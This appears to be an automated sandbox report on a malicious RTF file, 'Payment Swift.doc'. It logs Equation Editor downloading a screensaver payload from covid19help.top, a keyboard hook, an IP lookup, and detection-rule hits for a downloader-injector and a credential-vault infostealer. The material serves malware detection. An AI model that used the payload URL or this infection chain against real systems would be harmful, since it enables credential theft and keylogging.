              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F049A0BE-DDAA-4F28-9F33-B6FAFB134366}.tmpJump to behavior
              Source: global trafficHTTP traffic detected: GET /microm.scr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: covid19help.topConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: covid19help.top
              Source: global trafficDNS traffic detected: DNS query: api.ipify.org
              Source: microme09255.scr, 00000006.00000002.883885788.000000000237E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org
              Source: EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.0000000005A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: EQNEDT32.EXE, 00000002.00000003.346877641.0000000000632000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.347780884.0000000000632000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
              Source: EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
              Source: EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
              Source: EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.0000000005A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
              Source: EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
              Source: EQNEDT32.EXE, 00000002.00000003.346863072.000000000426C000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512/dk/p_sha1
              Source: microme09255.scr.2.drString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#STR-Transform
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#STR-Transform0Tran
              Source: microme09255.scr.2.drString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
              Source: EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: EQNEDT32.EXE, 00000002.00000003.346877641.0000000000632000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.347780884.0000000000632000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
              Source: EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
              Source: EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
              Source: EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
              Source: EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
              Source: EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
              Source: microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/anonymous
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecision
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/country
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthxhttp://schemas.xmlsoap.org/ws/2005
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthyhttp://schemas.xmlsoap.org/ws/2005
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidrhttp://schemas.xmlsoap.org/ws/2005
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidshttp://schemas.xmlsoap.org/ws/2005
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressthttp://schemas.xmlsoap.org/ws/200
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressuhttp://schemas.xmlsoap.org/ws/200
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/homephone
              Source: microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
              Source: microme09255.scr, 00000006.00000002.883885788.00000000022C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcode
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcodezhttp://schemas.xmlsoap.org/ws/2005/
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/privatepersonalidentifier
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/privatepersonalidentifierzhttp://schemas.xmlso
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
              Source: microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddress
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintshttp://schemas.xmlsoap.org/ws/2005/
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/webpage
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishedname
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishedname~http://schemas.xmlsoap.o
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims~http://schemas.xmlsoap.org/ws/2005/05/identity
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/identity
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/rightzhttp://schemas.xmlsoap.org/ws/2005/05/identity/
              Source: EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
              Source: EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
              Source: microme09255.scr, 00000005.00000002.348615893.000000000339A000.00000004.00000800.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.883629068.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
              Source: microme09255.scr, 00000005.00000002.348615893.000000000339A000.00000004.00000800.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.883885788.00000000022C1000.00000004.00000800.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.883629068.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
              Source: microme09255.scr, 00000006.00000002.883885788.00000000022C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
              Source: microme09255.scr, 00000006.00000002.883885788.00000000022C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
              Source: EQNEDT32.EXE, 00000002.00000003.346877641.0000000000632000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.347780884.00000000005FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/microm.scr
              Source: EQNEDT32.EXE, 00000002.00000003.346877641.0000000000632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/microm.scrC:
              Source: EQNEDT32.EXE, 00000002.00000002.347780884.00000000005FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/microm.scrY
              Source: EQNEDT32.EXE, 00000002.00000002.347780884.00000000005FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/microm.scrj
              Source: EQNEDT32.EXE, 00000002.00000002.347780884.00000000005FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/microm.scrkkC:
              Source: EQNEDT32.EXE, 00000002.00000003.346877641.000000000061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/t
              Source: EQNEDT32.EXE, 00000002.00000003.346877641.0000000000632000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.347780884.0000000000632000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
              Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
              Source: unknownHTTPS traffic detected: 104.21.83.128:443 -> 192.168.2.22:49161 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.22:49162 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: 5.2.microme09255.scr.344a420.5.raw.unpack, A1HZ.cs.Net Code: _5O4
              Source: C:\Users\user\AppData\Roaming\microme09255.scrWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\microme09255.scrJump to behavior

              System Summary

              barindex
              Source: Payment Swift.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
              Source: 5.2.microme09255.scr.47c0000.7.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
              Source: 5.2.microme09255.scr.332dd90.4.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
              Source: 5.2.microme09255.scr.344a420.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 5.2.microme09255.scr.47c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
              Source: 6.2.microme09255.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 5.2.microme09255.scr.340f9f0.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 5.2.microme09255.scr.332dd90.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
              Source: 5.2.microme09255.scr.344a420.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 5.2.microme09255.scr.22cf214.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
              Source: 5.2.microme09255.scr.340f9f0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 5.2.microme09255.scr.22d1a54.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
              Source: 00000005.00000002.348836350.00000000047C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects downloader injector Author: ditekSHen
              Source: Screenshot number: 4Screenshot OCR: Enable editing from the yellow bar above.The independent auditors' opinion says the financial state
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\microme09255.scrJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\microm[1].scrJump to dropped file
              Source: C:\Users\user\AppData\Roaming\microme09255.scrProcess Stats: CPU usage > 49%
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\microme09255.scrCode function: 5_2_001C3D2F5_2_001C3D2F
              Source: C:\Users\user\AppData\Roaming\microme09255.scrCode function: 6_2_003939006_2_00393900
              Source: C:\Users\user\AppData\Roaming\microme09255.scrCode function: 6_2_0039F3606_2_0039F360
              Source: C:\Users\user\AppData\Roaming\microme09255.scrCode function: 6_2_00398C006_2_00398C00
              Source: C:\Users\user\AppData\Roaming\microme09255.scrCode function: 6_2_003945186_2_00394518
              Source: C:\Users\user\AppData\Roaming\microme09255.scrCode function: 6_2_0039BE886_2_0039BE88
              Source: C:\Users\user\AppData\Roaming\microme09255.scrCode function: 6_2_00393C486_2_00393C48
              Source: C:\Users\user\AppData\Roaming\microme09255.scrCode function: 6_2_0039E54A6_2_0039E54A
              Source: C:\Users\user\AppData\Roaming\microme09255.scrCode function: 6_2_009209806_2_00920980
              Source: C:\Users\user\AppData\Roaming\microme09255.scrCode function: 6_2_009255F06_2_009255F0
              Source: C:\Users\user\AppData\Roaming\microme09255.scrCode function: 6_2_009265506_2_00926550
              Source: C:\Users\user\AppData\Roaming\microme09255.scrCode function: 6_2_00921A406_2_00921A40
              Source: C:\Users\user\AppData\Roaming\microme09255.scrCode function: 6_2_009287786_2_00928778
              Source: Payment Swift.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
              Source: 5.2.microme09255.scr.47c0000.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
              Source: 5.2.microme09255.scr.332dd90.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
              Source: 5.2.microme09255.scr.344a420.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 5.2.microme09255.scr.47c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
              Source: 6.2.microme09255.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 5.2.microme09255.scr.340f9f0.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 5.2.microme09255.scr.332dd90.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
              Source: 5.2.microme09255.scr.344a420.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 5.2.microme09255.scr.22cf214.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
              Source: 5.2.microme09255.scr.340f9f0.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 5.2.microme09255.scr.22d1a54.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
              Source: 00000005.00000002.348836350.00000000047C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
              Source: 5.2.microme09255.scr.344a420.5.raw.unpack, YsTq4S.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.2.microme09255.scr.344a420.5.raw.unpack, YsTq4S.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.2.microme09255.scr.344a420.5.raw.unpack, ZNczHvI78.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.2.microme09255.scr.344a420.5.raw.unpack, ZNczHvI78.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.2.microme09255.scr.344a420.5.raw.unpack, ZNczHvI78.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.2.microme09255.scr.344a420.5.raw.unpack, ZNczHvI78.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.2.microme09255.scr.344a420.5.raw.unpack, G2Tmmpnyphl.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.2.microme09255.scr.344a420.5.raw.unpack, G2Tmmpnyphl.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 5.2.microme09255.scr.332dd90.4.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
              Source: 5.2.microme09255.scr.47c0000.7.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
              Source: microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drBinary or memory string: 9NHY9.vBP_AKdRKKcR
